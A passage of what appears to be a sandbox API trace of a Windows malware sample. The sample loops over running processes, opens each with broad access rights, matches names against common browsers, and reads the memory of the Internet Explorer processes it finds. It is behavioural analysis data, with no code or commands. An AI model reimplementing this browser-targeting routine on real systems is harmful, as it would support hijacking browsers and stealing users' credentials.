	[0211.241] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0211.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.242] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.242] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0211.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.242] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.243] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0211.244] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x39f4
	[0211.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.245] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0211.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.246] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.247] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0211.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.248] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.249] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0211.251] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x39f8
	[0211.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.252] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0211.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.253] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.254] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0211.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.254] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.255] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0211.255] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x39fc
	[0211.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.256] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0211.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.256] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.257] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0211.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.257] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.257] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0211.258] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x3a00
	[0211.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.258] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0211.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.259] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.259] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0211.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.260] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.261] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0211.261] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x3a04
	[0211.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.261] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0211.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.262] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.262] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0211.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.263] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.263] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0211.264] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x3a08
	[0211.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.264] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0211.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.264] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0211.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.264] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0211.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.265] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.265] NtQueryInformationProcess (in: ProcessHandle=0x3a08, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0211.265] ReadProcessMemory (in: hProcess=0x3a08, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0211.265] ReadProcessMemory (in: hProcess=0x3a08, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0211.265] ReadProcessMemory (in: hProcess=0x3a08, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0211.265] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0211.266] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0211.266] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x3a0c
	[0211.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.266] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0211.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.267] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0211.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.267] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0211.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.267] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.267] NtQueryInformationProcess (in: ProcessHandle=0x3a0c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0211.267] ReadProcessMemory (in: hProcess=0x3a0c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0211.268] ReadProcessMemory (in: hProcess=0x3a0c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0211.268] ReadProcessMemory (in: hProcess=0x3a0c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0211.268] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0211.268] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0211.269] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x3a10
	[0211.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.269] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0211.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.269] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.269] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0211.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.270] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.270] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0211.270] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x3a14
	[0211.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.271] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0211.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.271] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.271] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0211.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.272] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.272] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.273] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x3a18
	[0211.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.273] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.273] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.273] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.274] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.274] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.275] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.275] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x3a1c
	[0211.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.275] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.276] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.276] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.276] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.277] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0211.277] CloseHandle (hObject=0x188) returned 1
	[0211.278] Sleep (dwMilliseconds=0x64) 
	[0211.381] GetCurrentProcessId () returned 0x110
	[0211.381] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0211.387] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0211.388] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0211.389] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0211.391] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x3a20
	[0211.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.391] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0211.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.391] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.392] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0211.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.393] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.393] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0211.394] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x3a24
	[0211.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.395] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0211.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.395] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.396] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0211.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.396] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.397] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0211.397] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x3a28
	[0211.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.398] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0211.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.398] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.398] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0211.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.399] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.399] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0211.399] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x3a2c
	[0211.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.400] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0211.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.400] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.400] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0211.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.400] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.401] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0211.401] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x3a30
	[0211.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.401] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0211.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.402] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.402] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0211.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.402] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.403] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0211.403] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3a34
	[0211.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.403] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0211.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.404] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.404] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0211.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.404] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.405] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0211.405] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x3a38
	[0211.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.405] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0211.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.406] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.406] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0211.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.406] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.406] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0211.407] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3a3c
	[0211.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.407] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0211.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.407] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.408] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0211.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.408] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.408] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.409] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x3a40
	[0211.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.409] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.409] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.409] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.410] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.410] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.411] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x3a44
	[0211.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.411] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.411] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.411] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.412] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
